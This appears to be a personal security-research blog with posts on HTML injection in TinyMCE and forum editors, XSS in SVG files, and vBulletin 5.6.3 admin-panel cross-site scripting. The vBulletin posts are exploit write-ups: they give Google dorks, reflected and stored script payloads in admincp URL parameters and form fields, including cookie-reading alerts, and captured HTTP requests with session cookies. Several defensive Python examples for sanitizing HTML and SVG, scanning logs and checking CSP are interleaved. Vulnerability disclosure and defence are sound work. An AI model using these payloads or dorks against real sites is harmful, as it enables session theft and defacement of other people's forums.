Monday, October 19, 2020

Geoguessr.com - a good game for those who love geography and thinking.

No, I have not looked for bugs on this site. I'm just playing. I want to share this site.

A good game for the brain.

You need to determine the exact place of your position on the map.

Road signs will help with this. For example, the sign "Water!" Where could such a sign be? Where is water needed? Europe or Australia? Africa!

Also, the language in which the road signs are written.

Or nature. Moss on trees, beautiful northern forest, conifers, flat road, country houses... Sweden or Norway? Wait... this could be Canada.

Saturday, October 17, 2020

HTML Injection with TinyMCE 5 and other editors. (testing)

I changed my post today.

Reason:

https://www.tiny.cloud/docs/advanced/security/

And I found https://www.blackhat.com/docs/eu-14/materials/eu-14-Javed-Revisiting-XSS-Sanitization-wp.pdf

By default, iframe and other things are allowed. If you haven't made the settings yet, you can do it.

 

I wrote my question to support and got an answer:

TinyMCE supports adding iframes to content. If you wish to disallow this, you can set invalid_elements: 'iframe' in the parameters object passed to the tinymce.init function.

In a public forum, members of the public can add content, so some defacing is always possible. It's up to the system itself what type of content they allow to be published.

Even if TinyMCE did block the problematic content, there are still ways the user can save problematic content using JS that bypasses TinyMCE. So it's also up to the system to filter or validate content server-side.

If the user is able to insert content into TinyMCE - by pasting, using the UI, or using TinyMCE's JS APIs - and that content causes JS to execute, then we consider that an XSS vulnerability. Outside of that, it's up to the system itself to filter unwanted content.
 


Okay, it was an interesting testing experience.

Instead of pictures and media, you can use a table.

If you see a simple editor without media, pictures and tables, then you can try to use the POST method.

I made my tests on https://www.project.co/

We can see iframe attacks through the POST method (in the discussion) in the project, because iframe is allowed.

HTML injection video with the POST method:



In Foswiki too. I was registered as a simple user. I made a page in my profile with a direct link and an iframe site.


Iframe test:

HTML code injection:

With the POST method, you can make your post, quote or comment beautiful by using the div tag and changing the background.

<div style="background-image: url(https://ibin.co/5eGCDw8JXCre.gif); height: 1600px; width: 1015px;">

(But with the div tag, sometimes you can change the background of your post without using the POST method. Example: WordPress.)

Add a table or image if it is not in the editor. This sometimes works with the POST method. And yes... you can add JavaScript. This also works sometimes. ;)

(If you have started working on a bug bounty program (hackerone.com, hackenproof.com and others), then this information can be useful as a method.)

About other editors: with other editors, similar things are also possible. I chose TinyMCE because it is the most famous editor.
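The support reply quoted above makes the real point: invalid_elements only limits what the editor UI produces, and anyone who sends the form with a raw POST skips the editor entirely, so the server has to rebuild the HTML from an allow-list before storing it. The following is an added example written for this post (it is not TinyMCE code and not the author's tooling): a small server-side sanitizer on Python's html.parser that keeps a fixed set of elements and attributes, drops iframe, script, div and every style= or on*= attribute, and refuses javascript: URLs. The element list, the sample input and the URL policy are assumptions chosen for the illustration.

```python
"""Server-side allow-list sanitizer for editor-submitted HTML.

Added example for this post, not TinyMCE code. It illustrates the support
reply above: invalid_elements only constrains what the editor UI emits, and a
user who sends the form with a raw POST skips the editor entirely, so the
server must rebuild the HTML from an allow-list before storing it.
"""
from html import escape
from html.parser import HTMLParser

# Elements a forum post may contain, and the attributes allowed on each
# (an assumed policy). Everything else (div, iframe, script, style=, on*=) is dropped.
ALLOWED = {
    "p": set(), "br": set(), "b": set(), "i": set(), "u": set(),
    "strong": set(), "em": set(), "ul": set(), "ol": set(), "li": set(),
    "blockquote": set(), "table": set(), "tr": set(), "td": set(), "th": set(),
    "a": {"href"},
    "img": {"src", "alt"},
}
VOID = {"br", "img"}                                        # no closing tag
SWALLOW = {"script", "style", "iframe", "object", "embed"}  # drop with their content


def safe_url(value: str) -> bool:
    """Accept only http(s) or site-relative URLs (rejects javascript: and data:)."""
    v = value.replace("\x00", "").strip().lower()
    return v.startswith(("http://", "https://", "/"))


class Sanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.dropped = []     # element names removed; worth logging server-side
        self.skip_depth = 0   # > 0 while inside a SWALLOW element

    def handle_starttag(self, tag, attrs):
        if tag in SWALLOW:
            self.dropped.append(tag)
            self.skip_depth += 1   # an unclosed <iframe> swallows the rest: fail closed
            return
        if self.skip_depth or tag not in ALLOWED:
            self.dropped.append(tag)
            return
        kept = []
        for name, value in attrs:
            if name not in ALLOWED[tag] or value is None:
                continue       # style=, onerror=, etc. never reach the output
            if name in ("href", "src") and not safe_url(value):
                continue
            kept.append(f' {name}="{escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag in SWALLOW:
            self.skip_depth = max(0, self.skip_depth - 1)
            return
        if self.skip_depth or tag not in ALLOWED or tag in VOID:
            return
        self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.skip_depth:
            self.out.append(escape(data, quote=False))   # text is re-encoded on output


def sanitize(html: str):
    """Return (clean_html, dropped_elements) for an untrusted HTML string."""
    s = Sanitizer()
    s.feed(html)
    s.close()
    return "".join(s.out), s.dropped


# Constructed sample: what a bypassing POST might carry, modelled on this post.
SAMPLE = ('<p>Hi <b>there</b> <a href="javascript:alert(1)">x</a>'
          '<script>alert(document.cookie)</script>'
          '<iframe src="https://example.com/"></iframe></p>'
          '<div style="background-image: url(https://ibin.co/x.gif)">bg</div>'
          '<img src="https://example.com/a.gif" onerror="alert(1)" alt="a">')

if __name__ == "__main__":
    clean, dropped = sanitize(SAMPLE)
    print(clean)    # <p>Hi <b>there</b> <a>x</a></p>bg<img src="https://example.com/a.gif" alt="a">
    print(dropped)  # ['script', 'iframe', 'div']
```

The dropped list is the useful by-product: a post that loses an iframe or a script element on the way in is worth a log line, because it was not produced by the editor the site ships.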



 


HTML Code Injection. Change Beautiful Background Quotes on the Invision Power Community IP.Board.

This is hacks & tricks. But this is difficult for a simple user, because you will have 2 quotes with the POST method (2 quotes look ugly...) and you will not be able to delete one. But if you are a moderator...

I don't post the tutorial step by step and don't put any code here. This video is for informational purposes, as an interesting method of HTML code injection.

 


 

Tuesday, October 13, 2020

Useful Links. Cross Site Scripting.

Here will be useful links about XSS. Sometimes I will add new links.

1. (Old, but works!) OWASP

2. Cross-site scripting (XSS) cheat sheet. PortSwigger.

3. HTML Security Cheatsheet. HTML5.

4. XSSed, the best site for examples. XSSed.

5. Bypassing XSS Filters Using Data URIs. http://cubalo.github.io/

6. Online school. Although I use other apps on my smartphone. W3Schools Online.

7. HTML Cheat Sheet list. HTML tags.

8. XSS Polyglot. Razor blog.

9. Unleashing an Ultimate XSS Polyglot. XSS Polyglot. (But I have my own codes. They are larger in size.)

10. XSS String Encoder. Encoder.

11. Firefox Browser Developer Edition. Firefox. (I use plain Mozilla Firefox, but for my tests I use 2-3 browsers: Opera, Mozilla and Google Chrome. You need to understand that most users use Google Chrome, and it would be ideal if the XSS worked in Google Chrome.)

12. Fiddler is a popular web debugging proxy tool that monitors and logs the traffic between your computer and the website you are browsing. Fiddler.

13. HTTP Header Live. Displays the HTTP headers. Edit them and send. HTTP Header. (I like this addon.)

14. Packetstormsecurity. Good site for information about XSS methods. (You can see different exploits as examples.) Packetstormsecurity.

15. CVE® is a list of entries, each containing an identification number, a description, and at least one public reference, for publicly known cybersecurity vulnerabilities. CVE.


 

XSS in SVG files.

Now the largest CMSs do not allow uploading SVG files. But sometimes it can be done.

How to make an SVG file? It's simple.

Download the .svg file.

List of files useful for XSS testing!
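Why do the big CMSs refuse SVG uploads? Because an SVG is an XML document, and opened directly in a browser it can run script elements, on* event handlers and javascript: links. The checker below is an added example written for this page (not code from any CMS): it is what a site that must accept SVG can run on the upload before storing it. The element list, the size limit and the sample files are assumptions chosen for the illustration.

```python
"""Screen an uploaded SVG for script-bearing content before accepting it.

Added example for this post, not code from any CMS. An SVG is an XML document:
opened directly in a browser it can run <script>, on* event handlers and
javascript: links, which is why most CMSs refuse the upload outright. A site
that must accept SVG can at least reject the obvious cases, as below.
"""
import xml.etree.ElementTree as ET

# Elements that can carry script or embed arbitrary HTML (foreignObject). Assumed list.
BLOCKED_ELEMENTS = {"script", "foreignObject"}
BLOCKED_SCHEMES = ("javascript:", "data:", "vbscript:")


def _local(name: str) -> str:
    """Strip an XML namespace: '{http://www.w3.org/2000/svg}script' -> 'script'."""
    return name.rsplit("}", 1)[-1]


def svg_findings(data: bytes, max_bytes: int = 512 * 1024) -> list:
    """Return a list of reasons to reject the file; an empty list means it passed."""
    if len(data) > max_bytes:
        return [f"file exceeds {max_bytes} bytes"]
    text = data.decode("utf-8", errors="replace")
    # Refuse a DOCTYPE outright: it is where entity expansion and external
    # entity tricks live, and a plain image never needs one.
    if "<!DOCTYPE" in text.upper():
        return ["DOCTYPE declaration not accepted"]
    try:
        root = ET.fromstring(data)
    except ET.ParseError as exc:
        return [f"not well-formed XML: {exc}"]

    findings = []
    if _local(root.tag) != "svg":
        findings.append(f"root element is <{_local(root.tag)}>, not <svg>")
    for el in root.iter():
        tag = _local(el.tag)
        if tag in BLOCKED_ELEMENTS:
            findings.append(f"<{tag}> element")
        for attr, value in el.attrib.items():
            name = _local(attr).lower()
            if name.startswith("on"):
                findings.append(f"<{tag}> has {name}= event handler")
            elif name == "href":   # covers both href and xlink:href
                v = "".join(value.split()).lower()   # defeat whitespace-split schemes
                if v.startswith(BLOCKED_SCHEMES):
                    findings.append(f"<{tag}> href uses {v.split(':', 1)[0]}: scheme")
    return findings


def is_safe_svg(data: bytes) -> bool:
    return not svg_findings(data)


# Constructed samples: a plain icon and one carrying three script vectors.
SAFE_SVG = (b'<svg xmlns="http://www.w3.org/2000/svg" width="10" height="10">'
            b'<circle cx="5" cy="5" r="4" fill="red"/></svg>')
BAD_SVG = (b'<svg xmlns="http://www.w3.org/2000/svg" '
           b'xmlns:xlink="http://www.w3.org/1999/xlink">'
           b'<script>alert(1)</script>'
           b'<a xlink:href="javascript:alert(2)">'
           b'<text onclick="alert(3)">x</text></a></svg>')

if __name__ == "__main__":
    print(svg_findings(SAFE_SVG))   # []
    print(svg_findings(BAD_SVG))    # three findings: script element, javascript: href, onclick
```

Even a file that passes this check should be served with Content-Disposition: attachment or from a separate origin, because the check is a deny-list over the vectors it knows about, not proof that the file is inert.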



About XSS scanners.

I don't like XSS scanners.

I understand... a port scanner is a good thing, you can't see the ports of another computer with your own eyes without a scanner.

But why do we need an XSS scanner?

A scanner that looks for vulnerable fields does your job.

But what do you do then? I know. You drink Coca-Cola and wait for the scanner to do your job.

To later say "I found a bug." But you didn't find it. The scanner found it. You drank Coca-Cola.

Yes, it'll save your time.

But the scanner can't find very interesting things. The scanner won't give you experience.

What can you do? Throw away the XSS scanner or throw away the computer.
 


Friday, October 9, 2020

Hack and tricks on the Invision IP.Board

Today I will not post about cross-site scripting.

I want to show you how you can make your forum profile and comments prettier and better. Without any JavaScript.

But... I will not post the complete code and I will not write the concept step by step.

What do we have on the forum? A very basic profile. It looks boring.

Okay, let's play with HTTP Live Headers (Firefox) and use the POST method.

I will make my personal video list and redesign the post by changing its background. I can resize the video or background however I want.

What is the plus in the hack & tricks things? You can do whatever you want. Not the way everyone uses it.

The most interesting thing is when you can change something without having admin rights. With the rights of a simple user, not an administrator and not a moderator.

For the test I use a new demo version and a test account for the profile on Invision Community.

Let's take a look at the standard CKEditor, and what do we see here? We do not see an opportunity to post a video from YouTube or change the background on the page or in the comments.

Crazy Firefox :)

Saturday, September 5, 2020

vBulletin 5.6.3. Multiple Cross-Site Scripting Vulnerabilities

 https://pentest-vincent.blogspot.com/2020/09/about-exploits.html

# Exploit Title: vBulletin 5.6.3 Multiple cross-site scripting vulnerabilities
# Date: 05.09.2020
# Author: Vincent666 ibn Winnie
# Software Link: https://www.vbulletin.com/en/features/
# Tested on: Windows 10
# Web Browser: Mozilla Firefox & Opera
# Blog : https://pentest-vincent.blogspot.com/
# PoC: https://pentest-vincent.blogspot.com/2020/09/vbulletin-563-cross-site-scripting.html
# Google Dorks: "Powered by vBulletin® Version 5.6.3"

 

1.

 

I use the demo version 5.6.3:

https://www.vbulletin.com/en/vb5-trial/

Go to the "Admin CP" - click on "Styles" - click "Style Manager" - choose "Denim" or another theme, choose the action "Add new template" and click "Go".

Put "1" in the title and "1" in the template, then "Save and Reload". Now you can catch the new URL with HTTP Live Headers or by hand.

So we have the URL:

https://469caffdf16a-041586.demo.vbulletin.net/admincp/template.php?templateid=608&group=&expandset=&searchset=&searchstring=&do=edit&windowScrollTop=168&textareaScrollTop=0

Test it by hand and get cross-site scripting. Use different browsers for tests. I use Mozilla Firefox and Opera.

https://469caffdf16a-041586.demo.vbulletin.net/admincp/template.php?templateid=1&group=""><script>alert("Cross Site Scripting")</script><script>alert(document.cookie)</script>&expandset=&searchset=&searchstring=&do=edit&windowScrollTop=


Picture:


Video:





Big code to play with ;)


https://pastebin.com/CV4Yzntu

https://469caffdf16a-041586.demo.vbulletin.net/core/clientscript/codemirror/lib/codemirror.js?v=563
Host: 469caffdf16a-041586.demo.vbulletin.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://469caffdf16a-041586.demo.vbulletin.net/admincp/template.php?templateid=1&group=%22%22%3E%3Cscript%3Ealert(%22Cross%20Site%20Scripting%22)%3C/script%3E&expandset=&searchset=&searchstring=&do=edit&windowScrollTop=
Cookie: vb41586sessionhash=59aae5dd50001c516d71c59cd2043238; vb41586lastvisit=1599290306; vb41586lastactivity=1599294784; PHPSESSID=8a36de42d82550c3b703ff2dfbd2b99ec786b55243861e3b; BIGipServervbdemo-web_POOL=1459677194.20480.0000; vb41586np_notices_displayed=; vb41586cpsession=d16b326f99bd426c0fdd5c6966033ff0; vb41586sitebuilder_active=1; vb41586userstyleid=15

GET: HTTP/1.1 200 OK
Date: Sat, 05 Sep 2020 07:58:41 GMT
Last-Modified: Wed, 26 Aug 2020 18:26:32 GMT
ETag: "47ae7-5adcbf57b0600-gzip"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Cache-Control: max-age=1209600, private
Expires: Sat, 19 Sep 2020 07:58:41 GMT
Content-Type: application/javascript
---------------------

https://469caffdf16a-041586.demo.vbulletin.net/core/clientscript/vbulletin_templatemgr.js?v=563
Host: 469caffdf16a-041586.demo.vbulletin.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://469caffdf16a-041586.demo.vbulletin.net/admincp/template.php?templateid=1&group=%22%22%3E%3Cscript%3Ealert(%22Cross%20Site%20Scripting%22)%3C/script%3E&expandset=&searchset=&searchstring=&do=edit&windowScrollTop=
Cookie: vb41586sessionhash=59aae5dd50001c516d71c59cd2043238; vb41586lastvisit=1599290306; vb41586lastactivity=1599294784; PHPSESSID=8a36de42d82550c3b703ff2dfbd2b99ec786b55243861e3b; BIGipServervbdemo-web_POOL=1459677194.20480.0000; vb41586np_notices_displayed=; vb41586cpsession=d16b326f99bd426c0fdd5c6966033ff0; vb41586sitebuilder_active=1; vb41586userstyleid=15

GET: HTTP/1.1 200 OK
Date: Sat, 05 Sep 2020 07:25:40 GMT
Last-Modified: Wed, 26 Aug 2020 18:26:32 GMT
ETag: "221b-5adcbf57b0600-gzip"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Cache-Control: max-age=1209600, private
Expires: Sat, 19 Sep 2020 07:25:40 GMT
Content-Length: 4076
Content-Type: application/javascript
---------------------



2.

"Admin CP" - "Articles" - "Content List" - open the link in a new window (search for the word "First" and click).


https://469caffdf16a-041586.demo.vbulletin.net/admincp/cms.php?do=contentlist&page=1&perpage=25&tag=default


https://469caffdf16a-041586.demo.vbulletin.net/admincp/cms.php?do=contentlist&page=1&perpage=25&tag=[our XSS is here]


https://469caffdf16a-041586.demo.vbulletin.net/admincp/cms.php?do=contentlist&page=1&perpage=25&tag=""><script>alert("xss")</script>


Picture:



https://imgur.com/a/xL2F5rA



I need to pause with vBulletin.

I see a lot of bugs in the admin panel and I hope the developers will fix them. We are waiting for the new version of vBulletin. I like vBulletin more than other forum CMSs. This is a great CMS.

P.S.

I wanted to turn off my computer and go to bed. But I thought that maybe in stylevar.php I would find something. I poured tea and found XSS in 5 minutes.

3.

https://469caffdf16a-041586.demo.vbulletin.net/admincp/stylevar.php

https://469caffdf16a-041586.demo.vbulletin.net/admincp/stylevar.php?do=confirmrevert&dostyleid=15&stylevarid=[cross site scripting is here..]

https://469caffdf16a-041586.demo.vbulletin.net/admincp/stylevar.php?do=confirmrevert&dostyleid=15&stylevarid=%22%22%22%3E%3Cscript%3Ealert(%22vBulletin%205.6.3%20Multiple%20Cross%20Site%20Scripting%22)%3C/script%3E
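All three reflected cases in this post share a shape that a defender can watch for: the payload rides in a query-string parameter of an admincp page (group=, tag=, stylevarid=) and arrives percent-encoded, exactly as the captured Referer headers show it. The script below is an added example written for this page, not vBulletin code or the author's tooling: it reads access-log lines in the common combined format, decodes every query parameter (repeatedly, so double encoding does not hide anything) and reports requests under the admin path whose parameters carry markup. The log format, the path prefix, the heuristic pattern and the sample lines are assumptions; the sample lines are constructed and use documentation IP ranges.

```python
"""Flag reflected-XSS probes against admin endpoints in web-server access logs.

Added example for this post; it is not vBulletin code or the author's tooling.
The payloads above travel in query-string parameters (group=, tag=, stylevarid=)
and arrive percent-encoded, as the captured Referer headers show. Grepping raw
logs for "<script" misses them; decoding each parameter first does not.
"""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Apache/nginx "combined" log format; the constructed sample lines below follow it.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)
# Markup or script fragments once a value is decoded. Heuristic: tune the
# on*= clause for your application if it produces noise on legitimate values.
SUSPICIOUS = re.compile(r'<\s*/?\s*[a-z!]|javascript\s*:|\bon[a-z]+\s*=', re.IGNORECASE)


def decode_fully(value: str, rounds: int = 3) -> str:
    """Undo up to `rounds` layers of percent-encoding (double encoding is common)."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_params(target: str) -> list:
    """Return [(name, decoded_value)] for query parameters that look like XSS probes."""
    hits = []
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        decoded = decode_fully(value)     # parse_qsl already removed one layer
        if SUSPICIOUS.search(decoded):
            hits.append((name, decoded))
    return hits


def scan_log(lines, path_prefix: str = "/admincp/") -> list:
    """Return one alert per request under `path_prefix` carrying a suspicious parameter."""
    alerts = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        target = m.group("target")
        path = urlsplit(target).path
        if not path.startswith(path_prefix):
            continue
        hits = suspicious_params(target)
        if hits:
            alerts.append({"ip": m.group("ip"), "path": path,
                           "status": int(m.group("status")), "params": hits})
    return alerts


# Constructed log lines (IPs from the documentation ranges), modelled on the
# requests shown in this post: one plain request, one single-encoded probe,
# one double-encoded probe, and one outside the admin panel.
SAMPLE_LOG = [
    '198.51.100.7 - - [05/Sep/2020:07:25:40 +0000] "GET /admincp/cms.php?do=contentlist&page=1&perpage=25&tag=default HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [05/Sep/2020:07:58:41 +0000] "GET /admincp/template.php?templateid=1&group=%22%22%3E%3Cscript%3Ealert(%22Cross%20Site%20Scripting%22)%3C/script%3E&do=edit HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [05/Sep/2020:22:03:30 +0000] "GET /admincp/stylevar.php?do=confirmrevert&dostyleid=15&stylevarid=%2522%253E%253Cscript%253Ealert(1)%253C%252Fscript%253E HTTP/1.1" 200 1385 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [05/Sep/2020:22:05:00 +0000] "GET /forum/main-forum?q=%3Cb%3Ehi HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(alert["ip"], alert["path"], alert["params"])
```

A 200 status on such a request is the detail worth escalating: the page rendered the parameter rather than rejecting it, which is the condition every URL in this post relies on.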

 

 
 
 
 

 

https://469caffdf16a-041586.demo.vbulletin.net/core/clientscript/vbulletin_stylevars.js?v=563
Host: 469caffdf16a-041586.demo.vbulletin.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://469caffdf16a-041586.demo.vbulletin.net/admincp/stylevar.php?do=confirmrevert&dostyleid=15&stylevarid=%22%22%22%3E%3Cscript%3Ealert(%22vBulletin%205.6.3%20Multiple%20Cross%20Site%20Scripting%22)%3C/script%3E
Cookie: vb41586sessionhash=d06600305ecde6184594af48383373ff; vb41586lastvisit=1599343406; vb41586lastactivity=1599344851; BIGipServervbdemo-web_POOL=1459677194.20480.0000; vb41586cpsession=250b09cd03c73a864836b2fd5cf6392b; PHPSESSID=84aa5ac7477d3368250b4af4be8d779d04852b856d185b8c; vb41586np_notices_displayed=

GET: HTTP/1.1 200 OK
Date: Sat, 05 Sep 2020 22:03:30 GMT
Last-Modified: Wed, 26 Aug 2020 18:26:32 GMT
ETag: "127b-5adcbf57b0600-gzip"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Cache-Control: max-age=1209600, private
Expires: Sat, 19 Sep 2020 22:03:30 GMT
Content-Length: 1385
Content-Type: application/javascript
---------------------

Wednesday, September 2, 2020

vBulletin 5.6.3 Admin CP Multiple Persistent Cross-Site Scripting Vulnerabilities

 https://pentest-vincent.blogspot.com/2020/09/about-exploits.html

# Exploit Title: vBulletin 5.6.3 Admin CP Multiple Persistent Cross-Site Scripting Vulnerabilities
# Date: 02.09.2020
# Author: Vincent666 ibn Winnie
# Software Link: https://www.vbulletin.com/en/vb5-trial/
# Tested on: Windows 10
# Web Browser: Mozilla Firefox,Opera.
# Blog : https://pentest-vincent.blogspot.com/
# PoC: https://pentest-vincent.blogspot.com/2020/09/vbulletin-563-multiple-persistent-cross.html
# Google Dorks: "Powered by vBulletin® Version 5.6.3"

I found a lot of fields in the Admin CP of vBulletin 5.6.3 vulnerable to XSS.

We can see persistent XSS in the Admin CP in vBulletin 5.6.3. If a user has access to the admin panel, they can create a new page with an XSS payload as the title.

1.

Click on "User Profile Fields" and choose "User Profile Field Manager" in the menu. Choose "Occupation" and click on "Edit". Put simple XSS code in the "Title" and "Description":

""><script>alert("xss")</script>

Save this. Click "Edit" and open:

https://8289cfe4157f-041544.demo.vbulletin.net/admincp/profilefield.php?do=edit&profilefieldid=4

And we can see stored XSS in "User Profile Field Manager".

Picture:


https://imgur.com/a/CebQFuT



https://8289cfe4157f-041544.demo.vbulletin.net/admincp/profilefield.php?do=update
Host: 8289cfe4157f-041544.demo.vbulletin.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 716
Origin: https://8289cfe4157f-041544.demo.vbulletin.net
Connection: keep-alive
Referer: https://8289cfe4157f-041544.demo.vbulletin.net/admincp/profilefield.php?do=edit&profilefieldid=4
Cookie: PHPSESSID=66bb49d8a0a0c85337e9f1ff2f477dd2c4c3278731f15b63; BIGipServervbdemo-web_POOL=1459677194.20480.0000; vb41544sessionhash=cabb7c438fad791fd753dd4ac0d63d9c; vb41544lastvisit=1599040629; vb41544lastactivity=1599046274; vb41544np_notices_displayed=; vb41544cpsession=9795d7b732a28c69b2b7cf6b45e633fd; vbulletin_inlinetag=1
Upgrade-Insecure-Requests: 1
s=cabb7c438fad791fd753dd4ac0d63d9c&do=update&adminhash=bcb0ead2d82b59b30a0fbbf87a2481ec&securitytoken=1599048055-ef3a49ab2f51ac32f08056eb9ebd789deab23514&title=Occupation ""><script>alert("xss")</script><script>alert(document.cookie)</script>&description=What's your job?&profilefield[profilefieldcategoryid]=0&profilefield[data]=&profilefield[maxlength]=100&profilefield[size]=25&newtype=input&profilefield[displayorder]=4&profilefield[required]=0&profilefield[editable]=1&profilefield[hidden]=0&profilefield[searchable]=1&profilefield[memberlist]=1&profilefield[showonpost]=0&profilefield[regex]=&type=input&profilefieldid=4
POST: HTTP/1.1 200 OK
Date: Wed, 02 Sep 2020 12:01:15 GMT
X-Frame-Options: sameorigin
Content-Security-Policy: frame-ancestors 'self'
Expires: 0
Cache-Control: private, post-check=0, pre-check=0, max-age=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Connection: keep-alive, Keep-Alive
Keep-Alive: timeout=2, max=100
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
---------------------
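One detail in the captured response above deserves a second look: it carries X-Frame-Options: sameorigin and Content-Security-Policy: frame-ancestors 'self'. Both headers only restrict who may frame the page; neither restricts which scripts may run, so the stored title executes with no policy in the way. The checker below is an added example written for this page (not vBulletin code): it reads a raw header block and reports which XSS-relevant protections are actually in force, with the captured headers and a constructed hardened variant as input. The hardened policy and its nonce value are assumptions for the illustration.

```python
"""Check captured response headers for what actually mitigates stored XSS.

Added example for this post, not vBulletin code. The responses above carry
X-Frame-Options: sameorigin and Content-Security-Policy: frame-ancestors 'self'.
Both only restrict who may frame the page (clickjacking); neither constrains
scripts, so the stored payload executes unhindered. This checker reads a raw
header block and reports which protections are really in force.
"""
from typing import Dict, List, Optional


def parse_headers(raw: str) -> Dict[str, str]:
    """Turn 'Name: value' lines into a dict keyed by lowercase name; status lines are skipped."""
    headers = {}
    for line in raw.splitlines():
        if ":" not in line or line.startswith(("HTTP/", "GET:", "POST:")):
            continue
        name, value = line.split(":", 1)
        headers[name.strip().lower()] = value.strip()
    return headers


def parse_csp(value: str) -> Dict[str, List[str]]:
    """Split a CSP header into {directive: [source expressions]}."""
    policy = {}
    for directive in value.split(";"):
        tokens = directive.split()
        if tokens:
            policy[tokens[0].lower()] = tokens[1:]
    return policy


def script_sources(csp: Dict[str, List[str]]) -> Optional[List[str]]:
    """Effective script policy: script-src, else default-src, else None (unrestricted)."""
    if "script-src" in csp:
        return csp["script-src"]
    return csp.get("default-src")


def xss_mitigations(raw_headers: str) -> dict:
    h = parse_headers(raw_headers)
    csp = parse_csp(h.get("content-security-policy", ""))
    sources = script_sources(csp)
    # Per CSP Level 2+, a nonce or hash source makes 'unsafe-inline' ignored,
    # so inline script is blocked unless 'unsafe-inline' stands without one.
    nonce_or_hash = sources is not None and any(
        s.startswith(("'nonce-", "'sha256-", "'sha384-", "'sha512-")) for s in sources)
    inline_blocked = sources is not None and ("'unsafe-inline'" not in sources or nonce_or_hash)
    return {
        "csp_present": bool(csp),
        "framing_restricted": "frame-ancestors" in csp
            or h.get("x-frame-options", "").lower() in ("deny", "sameorigin"),
        "script_src_defined": sources is not None,
        "inline_script_blocked": inline_blocked,
    }


# The relevant lines of the profilefield.php response captured above, and a
# constructed hardened variant for comparison (nonce value is made up).
CAPTURED = """POST: HTTP/1.1 200 OK
X-Frame-Options: sameorigin
Content-Security-Policy: frame-ancestors 'self'
Content-Type: text/html; charset=UTF-8"""

HARDENED = """HTTP/1.1 200 OK
X-Frame-Options: sameorigin
Content-Security-Policy: default-src 'self'; script-src 'self' 'nonce-r4nd0m'; frame-ancestors 'self'
Content-Type: text/html; charset=UTF-8"""

if __name__ == "__main__":
    print(xss_mitigations(CAPTURED))   # csp present, framing restricted, no script policy
    print(xss_mitigations(HARDENED))   # script policy defined, inline script blocked
```

A script-src with a nonce would not fix the injection itself (the title still needs output encoding), but it would turn the inline alert in these PoCs into a blocked-by-CSP console error, which is the difference between a defacement and a report.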

 

2.

Open "Channel Management" - "Channel Manager" - choose Blogs and click "Add Announcement". Put XSS code in the "Title" and save this.

Open the site's blogs page and we can see persistent XSS.

https://8289cfe4157f-041544.demo.vbulletin.net/blogs

Picture:

https://imgur.com/a/WPHSG1l

Also we can change any channel we want (Groups, Forum, Albums, etc.).

Example 2:

https://8289cfe4157f-041544.demo.vbulletin.net/social-groups

Picture:

https://imgur.com/a/9LbO67E


3.

Go to "User Titles". Click on "User Title Manager". Choose "Junior Member" and click "Edit" (simple example).

Put XSS code in the Title, save this and come back to "User Title Manager", and we have a persistent XSS.

Picture:

https://imgur.com/a/gLOPiwB

4.

Go to "Styles" - "Style Manager" and click on "Wood" (simple example), choose the action "Edit Style Options" - "Edit Settings" - "Go" and, yes, put XSS code in the Title and save this. We can see persistent XSS in the Style Manager.


Video:





Picture:




https://imgur.com/a/7iCKea1



https://8289cfe4157f-041544.demo.vbulletin.net/admincp/template.php?do=updatestyle
Host: 8289cfe4157f-041544.demo.vbulletin.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data; boundary=---------------------------270840692812758499333431033827
Content-Length: 1393
Origin: https://8289cfe4157f-041544.demo.vbulletin.net
Connection: keep-alive
Referer: https://8289cfe4157f-041544.demo.vbulletin.net/admincp/template.php?group=&do=editstyle&dostyleid=35
